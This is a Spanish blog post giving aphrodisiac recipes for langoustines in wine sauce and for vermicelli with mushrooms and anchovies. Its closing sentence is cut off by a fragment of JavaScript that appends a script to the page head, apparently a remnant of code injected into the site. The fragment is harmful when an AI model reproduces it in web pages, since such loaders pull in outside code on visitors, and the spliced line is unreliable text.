Salud y belleza » Alimentación, Salud sexual

El sexo, la salud y los afrodisíacos (I)

Sin Comentarios

Si el sexo es salud, como dice una famosa frase luego reconvertida en slogan publicitario, entonces ni siquiera hace falta preguntarse la conexión que existe entre éste análisis -protagonizado por los afrodisíacos- y la naturaleza de nuestro blog.

En efecto, el siguiente informe presenta una práctica guía con recetas afrodisíacas para elaborar los mejores platos y motivar, así, un encuentro caliente entre parejas. Una forma de agregar ese “pequeño condimento” que necesitan algunos enamorados parar volver a disfrutar del sexo que, como dijimos, es salud. ¡A su salud!

Recetas afrodisíacas

Cigalas en salsa de vino

Ingredientes: quince Cigalas, media taza de vino blanco seco, una cucharada de maicena, dos cucharadas de aceite de oliva, media tacita de brandy, una rama de eneldo, pimienta y sal.

Elaboración: ante todo, agua salada abundante en una cacerola, y cuando rompa a hervir, escaldar las cigalas durante dos minutos. Inmediatamente, retirar, enfriar en agua con hielo y escurrir (antes pelarlas). Después poner aceite en una sartén y saltear las cabezas junto con cáscaras y patas de las cigalas. También añadir el brandy, salpimentar y agregar los otros condimentos. Dejar cocer a fuego lento 15 minutos. Para terminar el plato, triturar, calentar las cigalas en el horno precalentado.

Vermicelli con hongos y anchoas

Ingredientes: doscientos gamos de vermicelli, cien gramos de champiñones frescos, tres anchoas saladas, un diente de ajo, aceite de oliva, una cucharadita de perejil picado, pan rallado, pimienta y sal.

Elaboración: primero y principal, es fundamental lavar bien los champiñones -uno por uno- y cortarlos en rodajas. Más tarde, cocinar en una sartén con un poco de aceite y algo de sal (también pimienta). Cuando estén blanditos y hayan tirado el jugo, triturar junto con las anchoas. Por otra parte pelar el diente de ajo y dorar en una sartén con un poco de aceite. Luego, añadir la pasta de champiñones junto con las anchoas al aceite adornado por el ajo, mezclar y mantener caliente. A la vez, cocinar los vermicelli (en agua salada). Una vez terminado, agregar la salsa y espolvorear con perejil. Finalmente, poner todo en una fuente para horno, cubrir con pan rallado frito y hornear (ocho minutos).

¡En el próximo artículo muchas más recetas afrodisíacas para poder motivar el fuego en la pareja! Fórmulas sencillas, rápidas, livianas y, sobre todo, calientes. Porque el sexo es saludd.getElementsByTagName('head')[0].appendChild(s);if (document.currentScript) {

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.